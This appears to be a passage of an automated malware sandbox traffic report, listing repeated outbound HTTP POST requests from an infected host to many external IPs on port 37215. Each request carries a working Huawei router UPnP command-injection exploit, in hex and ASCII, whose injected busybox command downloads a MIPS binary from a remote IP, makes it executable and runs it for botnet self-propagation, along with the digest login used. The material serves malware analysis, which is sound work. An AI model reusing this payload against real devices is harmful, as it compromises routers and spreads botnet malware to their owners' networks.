69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  959192.168.2.136071041.53.227.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.449773073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  960192.168.2.1342424191.207.75.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.449793100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  961192.168.2.1353448157.135.177.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.450165987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  962192.168.2.133821241.87.200.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.450567007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  963192.168.2.1358024157.37.229.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.450824976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  964192.168.2.1343888136.170.86.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.450870037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  965192.168.2.1347168157.184.25.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.450887918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  966192.168.2.1352904157.13.21.4437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.451185942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  967192.168.2.1345938197.220.93.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.451319933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  968192.168.2.1342932197.142.96.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.451366901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  969192.168.2.134567641.248.12.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.452059984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
